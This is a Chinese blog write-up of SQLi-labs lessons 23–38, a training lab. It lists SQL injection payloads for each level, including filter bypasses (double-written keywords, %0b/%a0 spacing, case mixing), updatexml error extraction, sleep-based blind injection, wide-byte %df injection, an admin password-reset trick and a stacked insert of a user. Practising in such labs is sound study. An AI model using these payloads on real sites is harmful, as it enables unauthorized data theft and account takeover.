【SQLi-labs】Adv Injections(23-38)
Less-23
单引号闭合,过滤注释符,其中判断列数无法使用order by,同时报错位为2
id=-1' and union select 1,2,3 and '1'='1
这里显示的password为1,不是代表1为报错位,而是1=1和后面形成闭合,逻辑为1,所以是1
Less-24
密码重置漏洞,通过注册一个新的用户,在修改新用户密码的时候间接修改admin用户的密码
admin' # //新建用户,密码123,登陆进去后点击修改密码为root
这个时候修改的密码为admin的密码,admin的密码变为root,admin’ #用户依然密码为123
Less-25
过滤and和or,通过&和||替换,单引号闭合,报错位为2,1不是报错为理由如23题
id=-1||'1
id=-1 union select 1,2,3 || '1
Less-25a
数字型闭合,and和or被替换,双写绕过
id=1 aandnd 1=2
id=1000 oorr 1=1
id=1 oorrder by 3
Less-26
过滤注释符和空格,同时还把%过滤了,单引号闭合
id=-1'||updatexml(1,concat(0x7e,database()),0)||'1'='1
id=-1'||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(database()))),0)||'1'='
=通过like替换,所有有空格的命令通过()替换,information中有or双写绕过
Less-26a
单引号+空格闭合,%a0代替空格绕过
[?id=100](http://127.0.0.1/sqllib/Less-26a/?id=100)')%a0union%a0select%a01,2,3%a0(’1’)=(’1
Less-27
过滤union和select,空格,注释符,单引号闭合,报错位为2,通过大小写绕过
id=1000'%0bor%0b'1'='1
id=1000'%0bunIOn%0bSeleCt%0b1,2,3%0bor%0b'1'='1
id不能为-1是因为过滤注释符--+,所以负号也不行也不行
Less-27a
盲注,双引号闭合,过滤union和select等之前的操作
?id=1"and(if(ascii(substr(database(),1,1))=115,sleep(5),0))and"1"="1
Less-28
单引号+括号闭合,过滤union select连在一起,双写不过滤,大小写全过滤,空格过滤
?id=10000')union%0Bunion%0Bselect%0Bselect%0B1,database(),3%0Bor%0B('1')=('1
union select连在一起才过滤,所以是一起双写
Less-28a
和Less-28一样,只是过滤少了一些,不做演示
Less-29
单引号闭合,unon联合注入
id=10000' union select 1,database(),3 or '1'='1
Less-30
双引号闭合,union联合注入
id=-1" union select 1,2,3 or "1"="1
Less-31
双引号+括号闭合,union联合注入
id=-1") union select 1,2,3 or ("1")=("1
Less-32
宽字节注入,单引号闭合,union联合注入
id=-1%df' union select 1,2,3 %23
Less-33
宽字节注入,单引号闭合,报错注入
id=1%df' and updatexml(1,concat(0x7e,database()),0) %23
Less-34
宽字节注入,POST提交,报错注入
admin%df' and updatexml(1,concat(0x7e,database()),0) #
Less-35
数字型闭合,union联合注入,宽字节注入
id=-1 union select 1,2,3
Less-36
单引号闭合,宽字节注入,报错注入
id=1%df' and updatexml(1,concat(0x7e,database()),0) %23
Less-37
单引号闭合,POST提交,宽字节注入,报错注入
admin%df' and updatexml(1,concat(0x7e,database()),0) #
Less-38
单引号闭合,union联合查询
id=-1' union select 1,2,3 %23
堆叠注入
id=1';insert into users(id,username,password) values(99,'zyx','root') %23
本文来自博客园,作者:icui4cu,转载请注明原文链接:https://www.cnblogs.com/icui4cu/p/16029419.html